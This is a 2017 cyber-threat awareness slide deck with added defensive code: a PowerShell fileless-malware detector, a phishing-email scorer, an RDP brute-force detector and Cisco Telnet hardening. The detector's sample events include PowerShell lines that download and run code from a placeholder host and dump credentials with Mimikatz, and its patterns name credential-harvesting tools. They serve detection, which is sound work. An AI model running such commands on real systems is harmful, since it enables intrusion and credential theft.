Slide 1: Cyber Threats & Trends
April 2017
Slide 2: Agenda
Current Threats
Recent Events
Protecting Your Business
…and yourself
Slide 3: Fileless Malware
Resides in RAM (not on the hard drive!), so the in-memory payload disappears on reboot; any persistence lives in the registry or scheduled tasks rather than in a file on disk.
Typically runs through tools already on the system (PowerShell, WMI, the registry), so there is no executable for antivirus to scan.
Provides remote access and credential harvesting.
Over 140 enterprises compromised worldwide.
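Because the payload never touches disk, detection has to key on how it is launched rather than on a file hash. The check below is an added example, not material from the deck: it scores process-creation records (constructed here in the shape of a Windows process-creation event, image path plus command line) for the tradecraft the slide describes, that is, PowerShell pulling code from the network and running it straight from memory, hidden-window and execution-policy-bypass switches, encoded commands, and credential-harvesting tool names. The indicator strings are an illustrative assumption, not a complete signature set, and the addresses are from a documentation range.

```python
"""Flag fileless (memory-only) PowerShell tradecraft in process-creation logs.

Added example, not from the slide deck. The records below are constructed in
the shape of Windows process-creation events (image path + command line); the
indicator strings are an illustrative assumption, not a complete signature set.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Indicators of code fetched from the network and run straight from memory,
# plus strings typical of credential-harvesting tooling.
SUSPICIOUS_PATTERNS = {
    "download_cradle": re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient"),
    "in_memory_exec": re.compile(r"(?i)\bIEX\b|Invoke-Expression|\[Reflection\.Assembly\]::Load|FromBase64String"),
    "cred_harvest": re.compile(r"(?i)mimikatz|sekurlsa|lsass"),
    "evasion_flags": re.compile(r"(?i)-nop\b|-noprofile|-w(indowstyle)?\s+hidden|-ep\s+bypass|-exec(utionpolicy)?\s+bypass"),
}
# -EncodedCommand (and its short forms) carries base64 of a UTF-16LE script.
ENCODED_FLAG = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def encode_powershell(script: str) -> str:
    """Encode a script the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    pid: int
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None


def analyse(record: Dict[str, object]) -> Optional[Finding]:
    """Score one process-creation record; return a Finding or None."""
    image = str(record["image"]).lower()
    cmd = str(record["command_line"])
    if not image.endswith("powershell.exe"):
        return None
    decoded = decode_encoded_command(cmd)
    # Match against the decoded script instead of the base64 blob so that
    # random base64 characters cannot produce chance hits.
    text = cmd if decoded is None else ENCODED_FLAG.sub(" ", cmd) + "\n" + decoded
    reasons = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text)]
    if decoded is not None:
        reasons.append("encoded_command")
    # Two independent indicators keep noise down: a lone -NoProfile is normal
    # in administrative scripts.
    if len(reasons) < 2:
        return None
    return Finding(pid=int(record["pid"]), reasons=sorted(reasons), decoded=decoded)


def detect_fileless(records) -> List[Finding]:
    return [f for f in (analyse(r) for r in records) if f is not None]


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events; 203.0.113.0/24 is a documentation address range.
SAMPLE_EVENTS = [
    {"pid": 4101, "image": PS,
     "command_line": r'powershell.exe -NoProfile -Command "Get-ChildItem C:\Logs"'},
    {"pid": 4188, "image": PS,
     "command_line": "powershell.exe -nop -w hidden -ep bypass -c "
                     "\"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')\""},
    {"pid": 4202, "image": PS,
     "command_line": "powershell.exe -enc " + encode_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/m'); "
         "Invoke-Mimikatz -DumpCreds")},
    {"pid": 4300, "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami"},
]

if __name__ == "__main__":
    for f in detect_fileless(SAMPLE_EVENTS):
        print(f.pid, ", ".join(f.reasons))
```

Feeding it real data needs command-line logging turned on (Sysmon event 1, or Security event 4688 with command-line auditing enabled); without it the encoded script is never recorded and only the hidden-window flags remain visible.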
Slide 4: Malvertising
Internet advertisements that install malware.
May redirect users to illegitimate or infected domains.
Exploit kits deliver the malware without the user's knowledge.
5 major malvertising campaigns shut down in last 4 months, potentially reaching millions of users.
Slide 5: Spear Phishing
Attackers use knowledge of an organization to manipulate employees.
Uses email or phone calls to pose as someone with authority.
Campaigns are in full force for the tax season, trying to gather W-2s and payroll information.
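The tells of the W-2 campaign on slide 5 are visible in the mail itself: an executive's name on a message that did not come from the company domain, a sender domain that only looks like the real one, a Reply-To that steers answers elsewhere, and a request for payroll data. The scorer below is an added example, not code from the deck or from Sera-Brynn; the organisation domain, executive names, confusable-character table and sample messages are all constructed for illustration.

```python
"""Header and content checks for spear-phishing tells: executive impersonation
through the display name, lookalike sender domains, Reply-To redirection and
payroll/W-2 requests.

Added example, not from the slide deck. The organisation domain, executive
names and the sample messages are constructed for illustration.
"""
from dataclasses import dataclass, field
from email import message_from_string
from email.utils import parseaddr
from typing import List

ORG_DOMAIN = "example.com"                 # assumption: the defended organisation
EXECUTIVES = {"pat morgan", "sam lee"}     # assumption: names worth impersonating
# Substitutions used to register domains that look like the real one.
CONFUSABLES = {"rn": "m", "vv": "w", "0": "o", "1": "l", "3": "e", "5": "s"}
PAYROLL_TERMS = ("w-2", "w2", "payroll", "wire transfer", "direct deposit")


def domain_of(address: str) -> str:
    return address.rsplit("@", 1)[1].lower() if "@" in address else ""


def is_lookalike(domain: str) -> bool:
    """True when domain is not ORG_DOMAIN but collapses to it after confusable substitution."""
    if domain == ORG_DOMAIN:
        return False
    folded = domain
    for fake, real in CONFUSABLES.items():
        folded = folded.replace(fake, real)
    return folded == ORG_DOMAIN


@dataclass
class Verdict:
    subject: str
    flags: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # One tell alone is common in legitimate mail; two together rarely are.
        return len(self.flags) >= 2


def assess(raw_message: str) -> Verdict:
    msg = message_from_string(raw_message)
    display_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = domain_of(from_addr)
    reply_domain = domain_of(parseaddr(msg.get("Reply-To", ""))[1])
    subject = msg.get("Subject", "")
    content = (subject + "\n" + str(msg.get_payload())).lower()
    v = Verdict(subject=subject)
    if display_name.strip().lower() in EXECUTIVES and from_domain != ORG_DOMAIN:
        v.flags.append("exec_name_external_sender")
    if is_lookalike(from_domain):
        v.flags.append("lookalike_domain")
    if reply_domain and reply_domain != from_domain:
        v.flags.append("reply_to_mismatch")
    if any(term in content for term in PAYROLL_TERMS):
        v.flags.append("payroll_request")
    return v


# Constructed sample messages (RFC 822 text, plain bodies).
SAMPLES = [
    "From: Pat Morgan <pat.morgan@example.com>\nSubject: Q2 planning\n\n"
    "Draft attached, comments welcome.\n",
    "From: \"Pat Morgan\" <pat.morgan@exarnple.com>\nSubject: Urgent: W-2 copies\n\n"
    "Please send me the W-2s for all employees today.\n",
    "From: \"Sam Lee\" <sam.lee.ceo@webmail.example.net>\nReply-To: payments@mailbox.example.org\n"
    "Subject: Wire transfer\n\nI need a wire transfer sent before noon, keep this between us.\n",
    "From: HR <hr@example.com>\nSubject: Payroll schedule\n\nPayroll for March closes Friday.\n",
]

if __name__ == "__main__":
    for raw in SAMPLES:
        v = assess(raw)
        print(f"{'SUSPICIOUS' if v.suspicious else 'ok':10} {v.subject!r} {v.flags}")
```

The display-name check is the one that catches the phone-call variant's email cousin: the attacker needs the victim to see a familiar name, and the name is the one thing they cannot make match the real sending domain without first compromising a mailbox.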
Slide 6: Ransomware as a Service
Encrypts your data right under your nose. Pay to decrypt it or lose it!
Highly developed attack software is now sold to attackers. The attackers choose the targets, and the developers keep part of the profit.
Profitable and low risk through digital currencies such as Bitcoin.
Slide 7: Ransomware via Compromise
Attackers break into a system themselves and install the malware by hand.
Ongoing campaign against Remote Desktop Protocol (RDP) exposed to the public internet, typically by guessing weak passwords.
Attacks started in 2016 and have been rising in early 2017.
The access gained is often used for other purposes as well, not only ransomware.
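The RDP campaign on slide 7 leaves a distinctive trail in the Windows Security log: a burst of failed logons from one address followed by a success. The detector below is an added example, not from the deck; its log lines are constructed and reduced to the fields the check needs. Event 4625 is a failed logon and 4624 a successful one; logon type 10 is RemoteInteractive (RDP). With Network Level Authentication enabled, RDP failures are commonly recorded as logon type 3, so both types are counted.

```python
"""Spot RDP password guessing and the logon that follows it in Windows
Security-log events.

Added example, not from the slide deck. The log lines are constructed and
reduced to: timestamp, event ID, logon type, source address, account.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Tuple

THRESHOLD = 5                       # failures within WINDOW that count as guessing
WINDOW = timedelta(minutes=10)
RDP_LOGON_TYPES = {10, 3}           # 10 = RemoteInteractive; 3 = what NLA failures log as


def parse(line: str) -> Tuple[datetime, int, int, str, str]:
    ts, event_id, logon_type, src_ip, account = line.split()
    return datetime.fromisoformat(ts), int(event_id), int(logon_type), src_ip, account


def detect(lines: List[str]) -> Tuple[Dict[str, datetime], Dict[str, Tuple[datetime, str]]]:
    """Return (guessing sources -> time the threshold was crossed,
               guessing sources that later logged on -> (time, account))."""
    recent_failures: Dict[str, Deque[datetime]] = defaultdict(deque)
    guessing: Dict[str, datetime] = {}
    logged_on: Dict[str, Tuple[datetime, str]] = {}
    for line in lines:
        ts, event_id, logon_type, src_ip, account = parse(line)
        if logon_type not in RDP_LOGON_TYPES:
            continue
        window = recent_failures[src_ip]
        while window and ts - window[0] > WINDOW:      # slide the window forward
            window.popleft()
        if event_id == 4625:
            window.append(ts)
            if len(window) >= THRESHOLD and src_ip not in guessing:
                guessing[src_ip] = ts
        elif event_id == 4624 and src_ip in guessing:
            # A success from a source that was guessing is the event to act on:
            # the account is likely compromised and ransomware may follow.
            logged_on[src_ip] = (ts, account)
    return guessing, logged_on


# Constructed events; addresses are from documentation ranges.
SAMPLE_LOG = """\
2017-03-12T02:14:07 4625 10 198.51.100.7 administrator
2017-03-12T02:14:09 4625 10 198.51.100.7 admin
2017-03-12T02:14:11 4625 10 198.51.100.7 administrator
2017-03-12T02:14:13 4625 10 198.51.100.7 backup
2017-03-12T02:14:15 4625 10 198.51.100.7 administrator
2017-03-12T02:14:20 4624 10 198.51.100.7 administrator
2017-03-12T02:30:00 4625 10 192.0.2.44 jsmith
2017-03-12T02:31:00 4625 10 192.0.2.44 jsmith
2017-03-12T02:32:00 4624 10 192.0.2.44 jsmith
2017-03-12T03:00:00 4625 3 203.0.113.5 svc_backup
2017-03-12T09:00:00 4624 2 10.0.0.5 jsmith
""".splitlines()

if __name__ == "__main__":
    guessing, logged_on = detect(SAMPLE_LOG)
    for ip, when in guessing.items():
        print(f"{ip}: {THRESHOLD}+ RDP failures by {when:%H:%M:%S}")
    for ip, (when, account) in logged_on.items():
        print(f"{ip}: logged on as {account} at {when:%H:%M:%S} after guessing")
```

The two mistyped passwords from 192.0.2.44 stay below the threshold and the console logon (type 2) is ignored, so only the guessing source that then succeeded is reported. The better fix is not to have port 3389 on the internet at all; where that is not possible, this is the alert to page on.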
Slide 8: DDoS as a Service
Distributed Denial of Service (DDoS) attacks bring down networks or websites by flooding the target with more traffic than it can process.
The Internet of Things (IoT) is a growing resource for attackers: cameras, DVRs, lightbulbs, and even stuffed animals.
Compromised IoT devices helped reach record highs near 700 Gbps, equivalent to the target streaming 140,000 HD movies simultaneously.
You can purchase DDoS attacks for as little as $5!
Slide 9: THREATS
Slide 10: Recent Events: IoT DDoS Attack
Reported Oct. 2016
A botnet army consisting mainly of CCTV cameras and DVRs took down a major DNS provider, making Twitter, Amazon, Tumblr, Reddit, Spotify, and Netflix unreachable.
The botnet's source code had already been released publicly, so any cyber criminal can build their own botnet army.
Slide 11: Recent Events: E-sports Ransom
Reported Dec. 2016
The attacker contacted the E-Sports Entertainment Association (ESEA) through its bug bounty program but demanded $100,000.
Over 1.5 million records were leaked, along with internal infrastructure configuration.
Slide 12: Recent Events: CloudPets Breach
Reported Jan. 2017
IoT stuffed animal company left an exposed database live for weeks after multiple notification attempts.
2.2 million voice recordings and 821,396 user accounts were revealed.
The data was stolen and held for ransom 3 times.
Slide 13: Recent Events: Verifone Internal Breach
Reported Jan. 2017
Corporate network was breached through nearly two dozen gas stations.
The company forced a password reset for all 5,300+ employees and contractors.
Slide 14: Recent Events: McDelivery
Reported Feb. 2017
McDonald's McDelivery app leaked 2.2 million records.
Records contained personal profile information.
Slide 15: Recent Events: Arby's Malware
Reported Feb. 2017
Malware discovered on payment systems in corporate-owned stores ("not all" of its 1,000+ stores).
Hundreds of thousands of cards compromised.
Slide 16: Recent Events: WordPress Sites Defaced
Reported Feb. 2017
A WordPress platform vulnerability (an unauthenticated content-injection bug in the REST API of 4.7.0 and 4.7.1, fixed in 4.7.2) led to 1.5 million web pages on 40k unique websites being defaced.
Unpatched sites are still vulnerable: update to 4.7.2 or later.
Slide 17: Recent Events: Cisco Zero-Day x 318
Reported Mar. 2017
WikiLeaks Vault 7 files revealed a flaw in a Cisco protocol (the Cluster Management Protocol, reached through the Telnet service; CVE-2017-3881) that can grant full control of network devices.
No patch yet: block the vulnerable service (Telnet) on all 318 affected hardware models and manage them over SSH instead.
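What "block the vulnerable service" looks like on the device, as an added example that is not part of the deck: Cisco's advisory for this disclosure (cisco-sa-20170317-cmp, CVE-2017-3881) places the flaw in Cluster Management Protocol handling inside the Telnet service and gives disabling Telnet in favour of SSH as the workaround. Below is a typical weak vty configuration beside the hardened one; the management subnet 10.0.0.0/24 and the ACL name are assumptions.

```text
! Before: Telnet accepted on the vty lines, from anywhere
line vty 0 4
 transport input telnet ssh

! After: SSH only, limited to the management subnet (assumed 10.0.0.0/24)
ip access-list standard MGMT-ONLY
 permit 10.0.0.0 0.0.0.255
 deny   any log
!
line vty 0 4
 transport input ssh
 access-class MGMT-ONLY in
 exec-timeout 10 0
```

Verify with `show running-config | include transport input` (every vty line should read `transport input ssh`), confirm from outside the management subnet that nothing answers on TCP/23, and save the change with `copy running-config startup-config` so it survives the reboot that a real patch will need later.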
Slide 18: Recent Events: Shadow Brokers Release
Initially posted August 2016; 5 leaks in total, the most recent in April 2017.
Contains hacking tools from NSA TAO.
Some FUD, but the vulnerabilities in supported Microsoft products were already patched; apply the updates.
Slide 19: Overall Trends
Technology alone is insufficient to deter cyber threats.
Attackers are becoming stealthier and staying for the long haul.
Attackers are hiding their tracks better.
Slide 20: How Can You Protect Your Business?
Ask a few simple questions about risk:
What critical information do you have?
Where is it? Who has access to it?
What would you do in a crisis situation?
Do you know your compliance requirements?
What gaps require insurance?
Slide 21: How Can You Protect Yourself?
Take Personal Responsibility:
Educate your kids on internet safety
Secure your home network, and put IoT devices on a separate network
Back up your data
Avoid coffee shop Wi-Fi
Evaluate the convenience vs. privacy tradeoff
Automate your monitoring wherever possible
Remember: NOTHING ever goes away once it's posted online
Slide 22: Terry Reece
terry.reece@sera-brynn.com
Questions?